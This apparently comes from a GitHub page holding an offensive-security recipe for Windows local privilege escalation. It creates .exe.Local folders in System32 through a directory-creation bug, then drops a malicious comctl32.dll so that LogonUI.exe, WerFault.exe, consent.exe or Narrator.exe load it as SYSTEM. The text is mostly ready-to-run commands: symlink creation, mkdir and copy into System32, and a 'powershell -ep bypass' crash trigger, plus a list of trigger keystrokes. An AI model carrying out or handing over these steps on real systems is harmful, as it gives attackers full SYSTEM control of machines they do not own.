Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

47 lines (27 sloc) 2.25 KB
If you can create directory with FullControl access via service bugs, you can get SYSTEM shell from LogonUI.exe via dll hijacking.
Step 1. Create Directory in C:\windows\system32 as C:\Windows\System32\LogonUI.exe.Local .
createsymlink.exe C:\programdata\vulnlogs\somepath C:\Windows\System32\LogonUI.exe.Local
Then, you can create anything in C:\Windows\System32\LogonUI.exe.Local .
Step 2. Create directory in that folder.
mkdir C:\Windows\System32\LogonUI.exe.Local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.720_none_e6beb5c51314836b
Step 3. Create/copy payload dll file in that folder as comctl32.dll.
copy malicious.dll C:\Windows\System32\LogonUI.exe.Local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.720_none_e6beb5c51314836b\comctl32.dll
Step 4. Then restart or logon-logoff (winKey+ l). Your payload dll will execute as SYSTEM.
Thanks @PsiDragon for this advice.
Another Method by @jonasLyk
https://twitter.com/jonasLyk/status/1241314339623141376
https://twitter.com/404death/status/1240917568870731776
get SYSTEM shell from WerFault.exe via dll hijacking.
Same method with above.
1. create folder as C:\Windows\System32\WerFault.exe.Local via service bugs.
2. mkdir C:\Windows\System32\WerFault.exe.Local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.720_none_e6beb5c51314836b
3. copy malicious.dll C:\Windows\System32\WerFault.exe.Local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.720_none_e6beb5c51314836b\comctl32.dll
4. powershell -ep bypass -c "[Environment]::FailFast('Error')". Your payload dll will execute as SYSTEM.
-------------------
list process for directory create bug to system shell via comctl32.dll hijack like above methods.
1. C:\Windows\System32\consent.exe.Local (Triggered by running narrator.exe)
2. C:\Windows\System32\WerFault.exe.Local (Triggered by running powershell -ep bypass -c "[Environment]::FailFast('Error')" )
3. C:\Windows\System32\LogonUI.exe.Local (Triggered by running winkey+l)
4. C:\Windows\System32\Narrator.exe.Local (Triggered by running winkey+l ,Ease of access , WinKey+Ctrl+Enter)
5. ...... etc
Another exploitation tricks by James Forshaw : https://googleprojectzero.blogspot.com/2017/08/windows-exploitation-tricks-arbitrary.html
You can’t perform that action at this time.